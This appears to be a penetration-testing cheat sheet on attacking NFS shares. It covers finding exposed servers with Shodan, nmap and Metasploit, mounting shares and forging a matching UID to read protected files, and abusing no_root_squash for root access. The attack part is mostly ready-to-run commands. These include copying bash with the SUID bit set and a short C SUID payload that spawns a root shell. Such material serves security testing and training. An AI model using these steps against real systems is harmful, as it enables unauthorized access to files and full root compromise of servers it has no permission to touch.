NFS
NFS usually uses ports 111, 2049
What is NFS?
NFS (Network FileSysem) is a very stable and powerful file system for sharing storage devices of UNIX/Linux operating systems. Thanks to NFS; The same files can be accessed from multiple computers. It provides convenience in data storage. Instead of installing to the local disk for each application, it allows applications to be shared.
1
2
PORT STATE SERVICE VERSION
2049/tcp open nfs
NFS Pentesting
 Shodan search query : |
|---|
port:2049 |
Misconfigured NFS
A lot of data is obtained in file sharing in most of the companies that are tested for network penetration.
NFS Service Detection in Network with Nmap
1
2
nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount 10.10.x.x/24
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.10.x.x
Network NFS Service Detection with Metasploit
1
2
3
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS 10.10.x.x/24
msf auxiliary(nfsmount) > run
NFS Shares Listing With “showmount”
1
showmount -e 10.10.x.x
Access to discovered NFS shares
1
2
mount -t nfs 10.10.x.x:/export/home /mnt/connect_path
mount -t nfs -o vers=2 10.10.x.x:/export/home /mnt/connect_path -o nolock # You should specify to use version 2 because it doesn't have any authentication or authorization.
Access to discovered NFS shares with same user UID Permissions
In the terminal we can see the shared arguments and what UID value they belong to a user.
1
-rwxr----- 1923 1000 1898 example.doc
We see that there is a document. But we may need to open this doc file with a user with an authorized user UID. First of all, let’s unmount the mount we mounted with the unmount command. Then let’s create a user with the same UID value in the local system.
1
umount /connect_path
Yes, we have unmounted. Now let’s create a user with the same UID value.
1
useradd newuser
setting the user UID value
1
usermod -u 1923 newuser
Connecting the share to the local system again after setting the UID value.
1
mount -t nfs 192.168.x.x:/export/home /home/newuser/Desktop/connect_path
NFS no_root_squash/no_all_squash misconfiguration PE
Read the /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.
no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
no_all_squash: This is similar to no_root_squash option but applies to non-root users. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd`{: .filepath} file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
Privilege Escalation
Remote Exploit
If you have found this vulnerability, you can exploit it:
Mounting that directory in a client machine, and as root copying inside the mounted folder the /bin/bash binary and giving it SUID rights, and executing from the victim machine that bash binary.
1
2
3
4
5
6
7
8
9
10
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash
#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell
Mounting that directory in a client machine, and as root copying inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it SUID rights, and execute from the victim machine that binary (you can find here some C SUID payloads).
1
2
3
4
5
6
7
8
9
10
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
Comments powered by Disqus.